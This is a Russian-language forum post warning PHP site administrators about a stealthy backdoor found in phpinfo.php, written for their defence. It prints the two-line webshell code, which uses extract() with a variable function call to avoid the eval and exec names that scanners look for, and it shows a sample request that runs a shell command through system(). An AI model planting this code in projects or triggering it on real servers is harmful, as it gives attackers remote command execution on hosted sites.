• Приветствую тебя уважаемый гость на форуме, посвященный компьютерам! В дружелюбной обстановке у вас будет возможность обсудить различные технические вопросы, касаемых: компьютеров, ноутбуков, программ для ПК. Обратите внимание, компьютерный форум Hard-Help.ru не коммерческий ресурс, то есть наши модераторы ничего не продают и не хвалят разные товары за деньги. Если это ваш первый визит, рекомендуем почитать справку по форуму. Для создания тем и размещения сообщений необходимо зарегистрироваться. После регистрации и успешной авторизации в темах не будет видна реклама от компании Google, а также появятся дополнительные функции. Желаем Вам приятного общения и новых друзей!

Необычный способ организации вызова PHP-бэкдора

Sanix

Забытый всеми юзер
Команда форума
Регистрация
31 Окт 2013
Сообщения
1,308
Репутация
0
Баллы
36
И так... Думаю, эта статейка поможет еще кому-нибудь, особенно php кодерам. Да и вообще людям, администрирующим хостинг с CMS'ом каким-нить, типа joomla и т.д.

Выявлен заслуживающий внимания PHP-бэкдор, активация которого производится без видимого обращения к таким функциям, как "eval", "exec", "system", "assert" и "preg_replace". Вместо явного указания eval и других сразу вызывающих подозрение функций, при установке бэкдора в файле phpinfo.php появляется несколько на первый взгляд неопасных строк:
Код:
@extract ($_REQUEST); 
@die ($ctime($atime));
При более вдумчивом просмотре становится ясно, что при помощи функции extract осуществляется создание переменных на основании данных, переданных в составе запроса GET или POST. Конструкция $ctime($atime) по сути является вызовом функции, имя которой хранится в переменной $ctime. Сформировав запрос "/phpinfo.php?ctime=system&atime=ls -la" получим вызов функции system() с аргументом "ls -la".
(c)источник

З.Ы. просьба модеров, прилепить тему в соответствующий раздел форума. Думаю, или раздел программирование, или компьютерная безопасность. Так же, думаю стОит обратить внимание админа на эту тему, пусть дырки латает ))
 
Сверху